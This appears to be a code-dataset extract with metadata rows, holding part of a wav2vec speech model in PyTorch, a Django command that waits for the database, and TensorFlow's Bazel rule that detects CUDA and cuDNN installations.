x = self.dropout_feats(features)
x = self.feature_aggregator(x)
x = self.dropout_agg(x)
if self.project_features is not None:
features = self.project_features(features)
x, targets = self.wav2vec_predictions(x, features)
result['cpc_logits'] = x
result['cpc_targets'] = targets
return result
def upgrade_state_dict_named(self, state_dict, name):
return state_dict
def max_positions(self):
"""Maximum length supported by the model."""
return sys.maxsize
def get_logits(self, net_output):
logits = net_output['cpc_logits']
return logits
def get_targets(self, sample, net_output, expand_steps=True):
t = net_output['cpc_targets']
return t.contiguous()
def get_target_weights(self, targets, net_output):
targets = net_output['cpc_targets']
if isinstance(targets, tuple) and targets[-1] is not None:
return targets[-1]
return 1.
class TransposeLast(nn.Module):
def __init__(self, deconstruct_idx=None):
super().__init__()
self.deconstruct_idx = deconstruct_idx
def forward(self, x):
if self.deconstruct_idx is not None:
x = x[self.deconstruct_idx]
return x.transpose(-2, -1)
class Fp32GroupNorm(nn.GroupNorm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def forward(self, input):
output = F.group_norm(
input.float(), self.num_groups, self.weight.float() if self.weight is not None else None,
self.bias.float() if self.bias is not None else None, self.eps)
return output.type_as(input)
class Fp32LayerNorm(nn.LayerNorm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def forward(self, input):
output = F.layer_norm(
input.float(), self.normalized_shape, self.weight.float() if self.weight is not None else None,
self.bias.float() if self.bias is not None else None, self.eps)
return output.type_as(input)
def norm_block(is_layer_norm, dim, affine=True):
if is_layer_norm:
mod = nn.Sequential(
TransposeLast(),
Fp32LayerNorm(dim, elementwise_affine=affine),
TransposeLast(),
)
else:
mod = Fp32GroupNorm(1, dim, affine=affine)
return mod
class ConvFeatureExtractionModel(nn.Module):
def __init__(self, conv_layers, dropout, log_compression, skip_connections, residual_scale, non_affine_group_norm):
super().__init__()
def block(n_in, n_out, k, stride):
return nn.Sequential(
nn.Conv1d(n_in, n_out, k, stride=stride, bias=False),
nn.Dropout(p=dropout),
norm_block(is_layer_norm=False, dim=n_out, affine=not non_affine_group_norm),
nn.ReLU(),
)
in_d = 1
self.conv_layers = nn.ModuleList()
for i, (dim, k, stride) in enumerate(conv_layers):
self.conv_layers.append(
block(in_d, dim, k, stride))
in_d = dim
self.log_compression = log_compression
self.skip_connections = skip_connections
self.residual_scale = math.sqrt(residual_scale)
def forward(self, x):
# BxT -> BxCxT
x = x.unsqueeze(1)
for conv in self.conv_layers:
residual = x
x = conv(x)
if self.skip_connections and x.size(1) == residual.size(1):
tsz = x.size(2)
r_tsz = residual.size(2)
residual = residual[..., ::r_tsz // tsz][..., :tsz]
x = (x + residual) * self.residual_scale
if self.log_compression:
x = x.abs()
x = x + 1
x = x.log()
return x
class ZeroPad1d(nn.Module):
def __init__(self, pad_left, pad_right):
super().__init__()
self.pad_left = pad_left
self.pad_right = pad_right
def forward(self, x):
return F.pad(x, (self.pad_left, self.pad_right))
class ConvAggegator(nn.Module):
def __init__(self, conv_layers, embed, dropout, skip_connections, residual_scale, non_affine_group_norm, conv_bias,
zero_pad):
super().__init__()
def block(n_in, n_out, k, stride):
# padding dims only really make sense for stride = 1
ka = k // 2
kb = ka - 1 if k % 2 == 0 else ka
pad = ZeroPad1d(ka + kb, 0) if zero_pad else nn.ReplicationPad1d((ka + kb, 0))
return nn.Sequential(
pad,
nn.Conv1d(n_in, n_out, k, stride=stride, bias=conv_bias),
nn.Dropout(p=dropout),
norm_block(False, n_out, affine=not non_affine_group_norm),
nn.ReLU(),
)
in_d = embed
self.conv_layers = nn.ModuleList()
self.residual_proj = nn.ModuleList()
for i, (dim, k, stride) in enumerate(conv_layers):
if in_d != dim and skip_connections:
self.residual_proj.append(
nn.Conv1d(in_d, dim, 1, bias=False),
)
else:
self.residual_proj.append(None)
self.conv_layers.append(
block(in_d, dim, k, stride))
in_d = dim
self.conv_layers = nn.Sequential(*self.conv_layers)
self.skip_connections = skip_connections
self.residual_scale = math.sqrt(residual_scale)
def forward(self, x):
for rproj, conv in zip(self.residual_proj, self.conv_layers):
residual = x
x = conv(x)
if self.skip_connections:
if rproj is not None:
residual = rproj(residual)
x = (x + residual) * self.residual_scale
return x
class Wav2VecPredictionsModel(nn.Module):
def __init__(self, in_dim, out_dim, prediction_steps, n_negatives, cross_sample_negatives, sample_distance,
dropout, offset, balanced_classes):
super().__init__()
self.n_negatives = n_negatives
self.cross_sample_negatives = cross_sample_negatives
self.sample_distance = sample_distance
self.project_to_steps = nn.ConvTranspose2d(in_dim, out_dim, (1, prediction_steps))
self.dropout = nn.Dropout(p=dropout)
self.offset = offset
self.balanced_classes = balanced_classes
def sample_negatives(self, y):
bsz, fsz, tsz = y.shape
y = y.transpose(0, 1) # BCT -> CBT
y = y.contiguous().view(fsz, -1) # CBT => C(BxT)
if self.cross_sample_negatives:
high = tsz * bsz
assert self.sample_distance is None, 'sample distance is not supported with cross sampling'
else:
high = tsz if self.sample_distance is None else min(tsz, self.sample_distance)
neg_idxs = torch.randint(low=0, high=high, size=(bsz, self.n_negatives * tsz))
if self.sample_distance is not None and self.sample_distance < tsz:
neg_idxs += torch.cat(
[torch.arange(start=1, end=tsz - self.sample_distance, device=neg_idxs.device, dtype=neg_idxs.dtype),
torch.arange(start=tsz - self.sample_distance, end=tsz - self.sample_distance * 2 - 1, step=-1,
device=neg_idxs.device, dtype=neg_idxs.dtype)])
if not self.cross_sample_negatives:
for i in range(1, bsz):
neg_idxs[i] += i * high
negs = y[..., neg_idxs.view(-1)]
negs = negs.view(fsz, bsz, self.n_negatives, tsz).permute(2, 1, 0, 3) # to NxBxCxT
return negs
def forward(self, x, y):
negatives = self.sample_negatives(y)
y = y.unsqueeze(0)
targets = torch.cat([y, negatives], dim=0)
x = x.unsqueeze(-1)
x = self.project_to_steps(x) # BxCxTxS
x = self.dropout(x)
x = x.unsqueeze(0).expand(targets.size(0), -1, -1, -1, -1)
copies, bsz, dim, tsz, steps = x.shape
steps = min(steps, tsz - self.offset)
predictions = x.new(bsz * copies * (tsz - self.offset + 1) * steps - ((steps + 1) * steps // 2) * copies * bsz)
labels = torch.zeros_like(predictions)
weights = torch.full_like(labels, 1 / self.n_negatives) if self.balanced_classes else None
start = end = 0
for i in range(steps):
offset = i + self.offset
end = start + (tsz - offset) * bsz * copies
pos_num = (end - start) // copies
predictions[start:end] = (x[..., :-offset, i] * targets[..., offset:]).sum(dim=2).flatten()
labels[start:start + pos_num] = 1.
if weights is not None:
weights[start:start + pos_num] = 1.
start = end
assert end == predictions.numel(), '{} != {}'.format(end, predictions.numel())
if weights is not None:
labels = (labels, weights)
return predictions, labels
@register_model_architecture('wav2vec', 'wav2vec')
def base_wav2vec_architecture(args):
conv_feature_layers = '[(512, 10, 5)]'
conv_feature_layers += ' + [(512, 8, 4)]'
conv_feature_layers += ' + [(512, 4, 2)] * 3'
args.conv_feature_layers = getattr(args, 'conv_feature_layers', conv_feature_layers)
args.conv_aggregator_layers = getattr(args, 'conv_aggregator_layers', '[(512, 3, 1)] * 9')
args.prediction_steps = getattr(args, 'prediction_steps', 12)
args.num_negatives = getattr(args, 'num_negatives', 1)
args.sample_distance = getattr(args, 'sample_distance', None)
args.cross_sample_negatives = getattr(args, 'cross_sample_negatives', False)
args.dropout = getattr(args, 'dropout', 0.)
args.dropout_features = getattr(args, 'dropout_features', 0.)
args.dropout_agg = getattr(args, 'dropout_agg', 0.)
args.encoder = getattr(args, 'encoder', 'cnn')
args.aggregator = getattr(args, 'aggregator', 'cnn')
args.skip_connections_feat = getattr(args, 'skip_connections_feat', False)
args.skip_connections_agg = getattr(args, 'skip_connections_agg', False)
args.residual_scale = getattr(args, 'residual_scale', 0.5)
args.gru_dim = getattr(args, 'gru_dim', 512)
args.no_conv_bias = getattr(args, 'no_conv_bias', False)
args.agg_zero_pad = getattr(args, 'agg_zero_pad', False)
args.log_compression = getattr(args, 'log_compression', False)
args.balanced_classes = getattr(args, 'balanced_classes', False)
args.project_features = getattr(args, 'project_features', 'none')
args.non_affine_group_norm = getattr(args, 'non_affine_group_norm', False)
args.offset = getattr(args, 'offset', 'auto')
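    # Illustrative note: with the default conv_feature_layers above the strides multiply
    # to 5 * 4 * 2 * 2 * 2 = 160, i.e. one feature frame per 160 input samples
    # (10 ms of audio, assuming 16 kHz input).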
| 38.793249 | 119 | 0.596422 |
d737774990b5c16b6c0a1030eb607d172755666f | 670 | py | Python | app/core/management/commands/wait_for_db.py | qwerty1199/recipe-app-api | 36acf8181513548b06bd371221182ac32964a49b | ["MIT"] | null | null | null | app/core/management/commands/wait_for_db.py | qwerty1199/recipe-app-api | 36acf8181513548b06bd371221182ac32964a49b | ["MIT"] | null | null | null | app/core/management/commands/wait_for_db.py | qwerty1199/recipe-app-api | 36acf8181513548b06bd371221182ac32964a49b | ["MIT"] | null | null | null |
import time
from django.db import connections
from django.db.utils import OperationalError
from django.core.management.base import BaseCommand
class Command(BaseCommand):
"""Django command to pause execution until the db is available"""
def handle(self, *args, **options):
self.stdout.write('Waiting for database...')
db_conn = None
while not db_conn:
try:
db_conn = connections['default']
except OperationalError:
self.stdout.write('Database unavailable, wait for 1 second...')
time.sleep(1)
self.stdout.write(self.style.SUCCESS('Database available!'))
| 31.904762 | 79 | 0.649254 |
83a377dde5c74806855de4264ebf0c2d557bffa0 | 40,788 | bzl | Python | third_party/gpus/cuda_configure.bzl | shreyanshp/tensorflow | 77867318b3c89e38828e787f3948ccae21bc0693 | ["Apache-2.0"] | null | null | null | third_party/gpus/cuda_configure.bzl | shreyanshp/tensorflow | 77867318b3c89e38828e787f3948ccae21bc0693 | ["Apache-2.0"] | null | null | null | third_party/gpus/cuda_configure.bzl | shreyanshp/tensorflow | 77867318b3c89e38828e787f3948ccae21bc0693 | ["Apache-2.0"] | null | null | null |
# -*- Python -*-
"""Repository rule for CUDA autoconfiguration.
`cuda_configure` depends on the following environment variables:
* `TF_NEED_CUDA`: Whether to enable building with CUDA.
* `GCC_HOST_COMPILER_PATH`: The GCC host compiler path
* `TF_CUDA_CLANG`: Whether to use clang as a cuda compiler.
* `CLANG_CUDA_COMPILER_PATH`: The clang compiler path that will be used for
both host and device code compilation if TF_CUDA_CLANG is 1.
* `CUDA_TOOLKIT_PATH`: The path to the CUDA toolkit. Default is
`/usr/local/cuda`.
* `TF_CUDA_VERSION`: The version of the CUDA toolkit. If this is blank, then
use the system default.
* `TF_CUDNN_VERSION`: The version of the cuDNN library.
* `CUDNN_INSTALL_PATH`: The path to the cuDNN library. Default is
`/usr/local/cuda`.
* `TF_CUDA_COMPUTE_CAPABILITIES`: The CUDA compute capabilities. Default is
`3.5,5.2`.
"""
_GCC_HOST_COMPILER_PATH = "GCC_HOST_COMPILER_PATH"
_CLANG_CUDA_COMPILER_PATH = "CLANG_CUDA_COMPILER_PATH"
_CUDA_TOOLKIT_PATH = "CUDA_TOOLKIT_PATH"
_TF_CUDA_VERSION = "TF_CUDA_VERSION"
_TF_CUDNN_VERSION = "TF_CUDNN_VERSION"
_CUDNN_INSTALL_PATH = "CUDNN_INSTALL_PATH"
_TF_CUDA_COMPUTE_CAPABILITIES = "TF_CUDA_COMPUTE_CAPABILITIES"
_TF_CUDA_CONFIG_REPO = "TF_CUDA_CONFIG_REPO"
_DEFAULT_CUDA_VERSION = ""
_DEFAULT_CUDNN_VERSION = ""
_DEFAULT_CUDA_TOOLKIT_PATH = "/usr/local/cuda"
_DEFAULT_CUDNN_INSTALL_PATH = "/usr/local/cuda"
_DEFAULT_CUDA_COMPUTE_CAPABILITIES = ["3.5", "5.2"]
# TODO(dzc): Once these functions have been factored out of Bazel's
# cc_configure.bzl, load them from @bazel_tools instead.
# BEGIN cc_configure common functions.
def find_cc(repository_ctx):
"""Find the C++ compiler."""
# On Windows, we use Bazel's MSVC CROSSTOOL for GPU build
# Return a dummy value for GCC detection here to avoid error
if _is_windows(repository_ctx):
return "/use/--config=win-cuda --cpu=x64_windows_msvc/instead"
if _use_cuda_clang(repository_ctx):
target_cc_name = "clang"
cc_path_envvar = _CLANG_CUDA_COMPILER_PATH
else:
target_cc_name = "gcc"
cc_path_envvar = _GCC_HOST_COMPILER_PATH
cc_name = target_cc_name
if cc_path_envvar in repository_ctx.os.environ:
cc_name_from_env = repository_ctx.os.environ[cc_path_envvar].strip()
if cc_name_from_env:
cc_name = cc_name_from_env
if cc_name.startswith("/"):
# Absolute path, maybe we should make this supported by our which function.
return cc_name
cc = repository_ctx.which(cc_name)
if cc == None:
fail(("Cannot find {}, either correct your path or set the {}" +
" environment variable").format(target_cc_name, cc_path_envvar))
return cc
_INC_DIR_MARKER_BEGIN = "#include <...>"
# OSX add " (framework directory)" at the end of line, strip it.
_OSX_FRAMEWORK_SUFFIX = " (framework directory)"
_OSX_FRAMEWORK_SUFFIX_LEN = len(_OSX_FRAMEWORK_SUFFIX)
def _cxx_inc_convert(path):
"""Convert path returned by cc -E xc++ in a complete path."""
path = path.strip()
if path.endswith(_OSX_FRAMEWORK_SUFFIX):
path = path[:-_OSX_FRAMEWORK_SUFFIX_LEN].strip()
return path
def _get_cxx_inc_directories_impl(repository_ctx, cc, lang_is_cpp):
"""Compute the list of default C or C++ include directories."""
if lang_is_cpp:
lang = "c++"
else:
lang = "c"
# TODO: We pass -no-canonical-prefixes here to match the compiler flags,
# but in cuda_clang CROSSTOOL file that is a `feature` and we should
# handle the case when it's disabled and no flag is passed
result = repository_ctx.execute([cc, "-no-canonical-prefixes",
"-E", "-x" + lang, "-", "-v"])
index1 = result.stderr.find(_INC_DIR_MARKER_BEGIN)
if index1 == -1:
return []
index1 = result.stderr.find("\n", index1)
if index1 == -1:
return []
index2 = result.stderr.rfind("\n ")
if index2 == -1 or index2 < index1:
return []
index2 = result.stderr.find("\n", index2 + 1)
if index2 == -1:
inc_dirs = result.stderr[index1 + 1:]
else:
inc_dirs = result.stderr[index1 + 1:index2].strip()
return [repository_ctx.path(_cxx_inc_convert(p))
for p in inc_dirs.split("\n")]
def get_cxx_inc_directories(repository_ctx, cc):
"""Compute the list of default C and C++ include directories."""
# For some reason `clang -xc` sometimes returns include paths that are
# different from the ones from `clang -xc++`. (Symlink and a dir)
# So we run the compiler with both `-xc` and `-xc++` and merge resulting lists
includes_cpp = _get_cxx_inc_directories_impl(repository_ctx, cc, True)
includes_c = _get_cxx_inc_directories_impl(repository_ctx, cc, False)
includes_cpp_set = set(includes_cpp)
return includes_cpp + [inc for inc in includes_c
if inc not in includes_cpp_set]
def auto_configure_fail(msg):
"""Output failure message when cuda configuration fails."""
red = "\033[0;31m"
no_color = "\033[0m"
fail("\n%sCuda Configuration Error:%s %s\n" % (red, no_color, msg))
# END cc_configure common functions (see TODO above).
def _host_compiler_includes(repository_ctx, cc):
"""Generates the cxx_builtin_include_directory entries for gcc inc dirs.
Args:
repository_ctx: The repository context.
cc: The path to the gcc host compiler.
Returns:
A string containing the cxx_builtin_include_directory for each of the gcc
host compiler include directories, which can be added to the CROSSTOOL
file.
"""
inc_dirs = get_cxx_inc_directories(repository_ctx, cc)
inc_entries = []
for inc_dir in inc_dirs:
inc_entries.append(" cxx_builtin_include_directory: \"%s\"" % inc_dir)
return "\n".join(inc_entries)
def _cuda_include_path(repository_ctx, cuda_config):
"""Generates the cxx_builtin_include_directory entries for cuda inc dirs.
Args:
repository_ctx: The repository context.
    cuda_config: The CUDA config as returned by _get_cuda_config.
  Returns:
    A string containing the cxx_builtin_include_directory for each of the CUDA
    toolkit include directories, which can be added to the CROSSTOOL
    file.
"""
nvcc_path = repository_ctx.path("%s/bin/nvcc%s" %
(cuda_config.cuda_toolkit_path,
".exe" if cuda_config.cpu_value == "Windows" else ""))
result = repository_ctx.execute([nvcc_path, '-v',
'/dev/null', '-o', '/dev/null'])
target_dir = ""
for one_line in result.stderr.splitlines():
if one_line.startswith('#$ _TARGET_DIR_='):
target_dir = (cuda_config.cuda_toolkit_path + '/' +
one_line.replace('#$ _TARGET_DIR_=', '') + "/include")
inc_entries = []
if target_dir != "":
inc_entries.append(" cxx_builtin_include_directory: \"%s\"" % target_dir)
default_include = cuda_config.cuda_toolkit_path + '/include'
inc_entries.append(" cxx_builtin_include_directory: \"%s\"" %
default_include)
return "\n".join(inc_entries)
def _enable_cuda(repository_ctx):
if "TF_NEED_CUDA" in repository_ctx.os.environ:
enable_cuda = repository_ctx.os.environ["TF_NEED_CUDA"].strip()
return enable_cuda == "1"
return False
def _cuda_toolkit_path(repository_ctx):
"""Finds the cuda toolkit directory.
Args:
repository_ctx: The repository context.
Returns:
A speculative real path of the cuda toolkit install directory.
"""
cuda_toolkit_path = _DEFAULT_CUDA_TOOLKIT_PATH
if _CUDA_TOOLKIT_PATH in repository_ctx.os.environ:
cuda_toolkit_path = repository_ctx.os.environ[_CUDA_TOOLKIT_PATH].strip()
if not repository_ctx.path(cuda_toolkit_path).exists:
auto_configure_fail("Cannot find cuda toolkit path.")
return str(repository_ctx.path(cuda_toolkit_path).realpath)
def _cudnn_install_basedir(repository_ctx):
"""Finds the cudnn install directory."""
cudnn_install_path = _DEFAULT_CUDNN_INSTALL_PATH
if _CUDNN_INSTALL_PATH in repository_ctx.os.environ:
cudnn_install_path = repository_ctx.os.environ[_CUDNN_INSTALL_PATH].strip()
if not repository_ctx.path(cudnn_install_path).exists:
auto_configure_fail("Cannot find cudnn install path.")
return cudnn_install_path
def _matches_version(environ_version, detected_version):
"""Checks whether the user-specified version matches the detected version.
This function performs a weak matching so that if the user specifies only the
major or major and minor versions, the versions are still considered matching
if the version parts match. To illustrate:
  environ_version  detected_version  result
  ------------------------------------------
  5.1.3            5.1.3             True
  5.1              5.1.3             True
  5                5.1               True
  5.1.3            5.1               False
  5.2.3            5.1.3             False
Args:
environ_version: The version specified by the user via environment
variables.
detected_version: The version autodetected from the CUDA installation on
the system.
Returns: True if user-specified version matches detected version and False
otherwise.
"""
environ_version_parts = environ_version.split(".")
detected_version_parts = detected_version.split(".")
if len(detected_version_parts) < len(environ_version_parts):
return False
for i, part in enumerate(detected_version_parts):
if i >= len(environ_version_parts):
break
if part != environ_version_parts[i]:
return False
return True
_NVCC_VERSION_PREFIX = "Cuda compilation tools, release "
def _cuda_version(repository_ctx, cuda_toolkit_path, cpu_value):
"""Detects the version of CUDA installed on the system.
Args:
repository_ctx: The repository context.
    cuda_toolkit_path: The CUDA install directory.
    cpu_value: The name of the host operating system.
Returns:
String containing the version of CUDA.
"""
# Run nvcc --version and find the line containing the CUDA version.
nvcc_path = repository_ctx.path("%s/bin/nvcc%s" %
(cuda_toolkit_path,
".exe" if cpu_value == "Windows" else ""))
if not nvcc_path.exists:
auto_configure_fail("Cannot find nvcc at %s" % str(nvcc_path))
result = repository_ctx.execute([str(nvcc_path), '--version'])
if result.stderr:
auto_configure_fail("Error running nvcc --version: %s" % result.stderr)
lines = result.stdout.splitlines()
version_line = lines[len(lines) - 1]
if version_line.find(_NVCC_VERSION_PREFIX) == -1:
auto_configure_fail(
"Could not parse CUDA version from nvcc --version. Got: %s" %
result.stdout)
# Parse the CUDA version from the line containing the CUDA version.
prefix_removed = version_line.replace(_NVCC_VERSION_PREFIX, '')
parts = prefix_removed.split(",")
if len(parts) != 2 or len(parts[0]) < 2:
auto_configure_fail(
"Could not parse CUDA version from nvcc --version. Got: %s" %
result.stdout)
full_version = parts[1].strip()
if full_version.startswith('V'):
full_version = full_version[1:]
# Check whether TF_CUDA_VERSION was set by the user and fail if it does not
# match the detected version.
environ_version = ""
if _TF_CUDA_VERSION in repository_ctx.os.environ:
environ_version = repository_ctx.os.environ[_TF_CUDA_VERSION].strip()
if environ_version and not _matches_version(environ_version, full_version):
auto_configure_fail(
("CUDA version detected from nvcc (%s) does not match " +
"TF_CUDA_VERSION (%s)") % (full_version, environ_version))
# We only use the version consisting of the major and minor version numbers.
version_parts = full_version.split('.')
if len(version_parts) < 2:
auto_configure_fail("CUDA version detected from nvcc (%s) is incomplete.")
if cpu_value == "Windows":
version = "64_%s%s" % (version_parts[0], version_parts[1])
else:
version = "%s.%s" % (version_parts[0], version_parts[1])
return version
_DEFINE_CUDNN_MAJOR = "#define CUDNN_MAJOR"
_DEFINE_CUDNN_MINOR = "#define CUDNN_MINOR"
_DEFINE_CUDNN_PATCHLEVEL = "#define CUDNN_PATCHLEVEL"
def _find_cuda_define(repository_ctx, cudnn_header_dir, define):
"""Returns the value of a #define in cudnn.h
Greps through cudnn.h and returns the value of the specified #define. If the
#define is not found, then raise an error.
Args:
repository_ctx: The repository context.
cudnn_header_dir: The directory containing the cuDNN header.
define: The #define to search for.
Returns:
The value of the #define found in cudnn.h.
"""
# Confirm location of cudnn.h and grep for the line defining CUDNN_MAJOR.
cudnn_h_path = repository_ctx.path("%s/cudnn.h" % cudnn_header_dir)
if not cudnn_h_path.exists:
auto_configure_fail("Cannot find cudnn.h at %s" % str(cudnn_h_path))
result = repository_ctx.execute(["grep", "--color=never", "-E", define, str(cudnn_h_path)])
if result.stderr:
auto_configure_fail("Error reading %s: %s" %
(result.stderr, str(cudnn_h_path)))
# Parse the cuDNN major version from the line defining CUDNN_MAJOR
lines = result.stdout.splitlines()
if len(lines) == 0 or lines[0].find(define) == -1:
auto_configure_fail("Cannot find line containing '%s' in %s" %
(define, str(cudnn_h_path)))
return lines[0].replace(define, "").strip()
def _cudnn_version(repository_ctx, cudnn_install_basedir, cpu_value):
"""Detects the version of cuDNN installed on the system.
Args:
repository_ctx: The repository context.
cpu_value: The name of the host operating system.
cudnn_install_basedir: The cuDNN install directory.
Returns:
A string containing the version of cuDNN.
"""
cudnn_header_dir = _find_cudnn_header_dir(repository_ctx,
cudnn_install_basedir)
major_version = _find_cuda_define(repository_ctx, cudnn_header_dir,
_DEFINE_CUDNN_MAJOR)
minor_version = _find_cuda_define(repository_ctx, cudnn_header_dir,
_DEFINE_CUDNN_MINOR)
patch_version = _find_cuda_define(repository_ctx, cudnn_header_dir,
_DEFINE_CUDNN_PATCHLEVEL)
full_version = "%s.%s.%s" % (major_version, minor_version, patch_version)
# Check whether TF_CUDNN_VERSION was set by the user and fail if it does not
# match the detected version.
environ_version = ""
if _TF_CUDNN_VERSION in repository_ctx.os.environ:
environ_version = repository_ctx.os.environ[_TF_CUDNN_VERSION].strip()
if environ_version and not _matches_version(environ_version, full_version):
cudnn_h_path = repository_ctx.path("%s/include/cudnn.h" %
cudnn_install_basedir)
auto_configure_fail(
("cuDNN version detected from %s (%s) does not match " +
"TF_CUDNN_VERSION (%s)") %
(str(cudnn_h_path), full_version, environ_version))
# We only use the major version since we use the libcudnn libraries that are
# only versioned with the major version (e.g. libcudnn.so.5).
version = major_version
if cpu_value == "Windows":
version = "64_" + version
return version
def _compute_capabilities(repository_ctx):
"""Returns a list of strings representing cuda compute capabilities."""
if _TF_CUDA_COMPUTE_CAPABILITIES not in repository_ctx.os.environ:
return _DEFAULT_CUDA_COMPUTE_CAPABILITIES
capabilities_str = repository_ctx.os.environ[_TF_CUDA_COMPUTE_CAPABILITIES]
capabilities = capabilities_str.split(",")
for capability in capabilities:
# Workaround for Skylark's lack of support for regex. This check should
# be equivalent to checking:
# if re.match("[0-9]+.[0-9]+", capability) == None:
parts = capability.split(".")
if len(parts) != 2 or not parts[0].isdigit() or not parts[1].isdigit():
auto_configure_fail("Invalid compute capability: %s" % capability)
return capabilities
def _cpu_value(repository_ctx):
"""Returns the name of the host operating system.
Args:
repository_ctx: The repository context.
Returns:
A string containing the name of the host operating system.
"""
os_name = repository_ctx.os.name.lower()
if os_name.startswith("mac os"):
return "Darwin"
if os_name.find("windows") != -1:
return "Windows"
result = repository_ctx.execute(["uname", "-s"])
return result.stdout.strip()
def _is_windows(repository_ctx):
"""Returns true if the host operating system is windows."""
return _cpu_value(repository_ctx) == "Windows"
def _lib_name(lib, cpu_value, version="", static=False):
"""Constructs the platform-specific name of a library.
Args:
lib: The name of the library, such as "cudart"
cpu_value: The name of the host operating system.
version: The version of the library.
    static: True if the library is static, False if it is a shared object.
Returns:
The platform-specific name of the library.
"""
if cpu_value in ("Linux", "FreeBSD"):
if static:
return "lib%s.a" % lib
else:
if version:
version = ".%s" % version
return "lib%s.so%s" % (lib, version)
elif cpu_value == "Windows":
return "%s.lib" % lib
elif cpu_value == "Darwin":
if static:
return "lib%s.a" % lib
else:
if version:
version = ".%s" % version
return "lib%s%s.dylib" % (lib, version)
else:
auto_configure_fail("Invalid cpu_value: %s" % cpu_value)
def _find_cuda_lib(lib, repository_ctx, cpu_value, basedir, version="",
static=False):
"""Finds the given CUDA or cuDNN library on the system.
Args:
lib: The name of the library, such as "cudart"
repository_ctx: The repository context.
cpu_value: The name of the host operating system.
basedir: The install directory of CUDA or cuDNN.
version: The version of the library.
static: True if static library, False if shared object.
Returns:
Returns a struct with the following fields:
file_name: The basename of the library found on the system.
path: The full path to the library.
"""
file_name = _lib_name(lib, cpu_value, version, static)
if cpu_value == "Linux":
path = repository_ctx.path("%s/lib64/%s" % (basedir, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path("%s/lib64/stubs/%s" % (basedir, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path(
"%s/lib/x86_64-linux-gnu/%s" % (basedir, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
elif cpu_value == "Windows":
path = repository_ctx.path("%s/lib/x64/%s" % (basedir, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path("%s/lib/%s" % (basedir, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path("%s/%s" % (basedir, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
auto_configure_fail("Cannot find cuda library %s" % file_name)
def _find_cupti_lib(repository_ctx, cuda_config):
"""Finds the cupti library on the system.
On most systems, the cupti library is not installed in the same directory as
the other CUDA libraries but rather in a special extras/CUPTI directory.
Args:
repository_ctx: The repository context.
cuda_config: The cuda configuration as returned by _get_cuda_config.
Returns:
Returns a struct with the following fields:
file_name: The basename of the library found on the system.
path: The full path to the library.
"""
file_name = _lib_name("cupti", cuda_config.cpu_value,
cuda_config.cuda_version)
if cuda_config.cpu_value == "Linux":
path = repository_ctx.path(
"%s/extras/CUPTI/lib64/%s" % (cuda_config.cuda_toolkit_path, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path(
"%s/lib/x86_64-linux-gnu/%s" % (cuda_config.cuda_toolkit_path,
file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
elif cuda_config.cpu_value == "Windows":
path = repository_ctx.path(
"%s/extras/CUPTI/libx64/%s" %
(cuda_config.cuda_toolkit_path, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path(
"%s/extras/CUPTI/lib/%s" % (cuda_config.cuda_toolkit_path, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
path = repository_ctx.path(
"%s/lib/%s" % (cuda_config.cuda_toolkit_path, file_name))
if path.exists:
return struct(file_name=file_name, path=str(path.realpath))
auto_configure_fail("Cannot find cupti library %s" % file_name)
def _find_libs(repository_ctx, cuda_config):
"""Returns the CUDA and cuDNN libraries on the system.
Args:
repository_ctx: The repository context.
cuda_config: The CUDA config as returned by _get_cuda_config
Returns:
Map of library names to structs of filename and path as returned by
_find_cuda_lib and _find_cupti_lib.
"""
cudnn_version = cuda_config.cudnn_version
cudnn_ext = ".%s" % cudnn_version if cudnn_version else ""
cpu_value = cuda_config.cpu_value
return {
"cuda": _find_cuda_lib("cuda", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path),
"cudart": _find_cuda_lib(
"cudart", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
cuda_config.cuda_version),
"cudart_static": _find_cuda_lib(
"cudart_static", repository_ctx, cpu_value,
cuda_config.cuda_toolkit_path, cuda_config.cuda_version, static=True),
"cublas": _find_cuda_lib(
"cublas", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
cuda_config.cuda_version),
"cusolver": _find_cuda_lib(
"cusolver", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
cuda_config.cuda_version),
"curand": _find_cuda_lib(
"curand", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
cuda_config.cuda_version),
"cufft": _find_cuda_lib(
"cufft", repository_ctx, cpu_value, cuda_config.cuda_toolkit_path,
cuda_config.cuda_version),
"cudnn": _find_cuda_lib(
"cudnn", repository_ctx, cpu_value, cuda_config.cudnn_install_basedir,
cuda_config.cudnn_version),
"cupti": _find_cupti_lib(repository_ctx, cuda_config),
}
def _find_cudnn_header_dir(repository_ctx, cudnn_install_basedir):
"""Returns the path to the directory containing cudnn.h
Args:
repository_ctx: The repository context.
cudnn_install_basedir: The cudnn install directory as returned by
_cudnn_install_basedir.
Returns:
The path of the directory containing the cudnn header.
"""
if repository_ctx.path(cudnn_install_basedir + "/cudnn.h").exists:
return cudnn_install_basedir
if repository_ctx.path(cudnn_install_basedir + "/include/cudnn.h").exists:
return cudnn_install_basedir + "/include"
if repository_ctx.path("/usr/include/cudnn.h").exists:
return "/usr/include"
auto_configure_fail("Cannot find cudnn.h under %s" % cudnn_install_basedir)
def _find_cudnn_lib_path(repository_ctx, cudnn_install_basedir, symlink_files):
"""Returns the path to the directory containing libcudnn
Args:
repository_ctx: The repository context.
cudnn_install_basedir: The cudnn install dir as returned by
_cudnn_install_basedir.
symlink_files: The symlink files as returned by _cuda_symlink_files.
Returns:
The path of the directory containing the cudnn libraries.
"""
lib_dir = cudnn_install_basedir + "/" + symlink_files.cuda_dnn_lib
if repository_ctx.path(lib_dir).exists:
return lib_dir
alt_lib_dir = cudnn_install_basedir + "/" + symlink_files.cuda_dnn_lib_alt
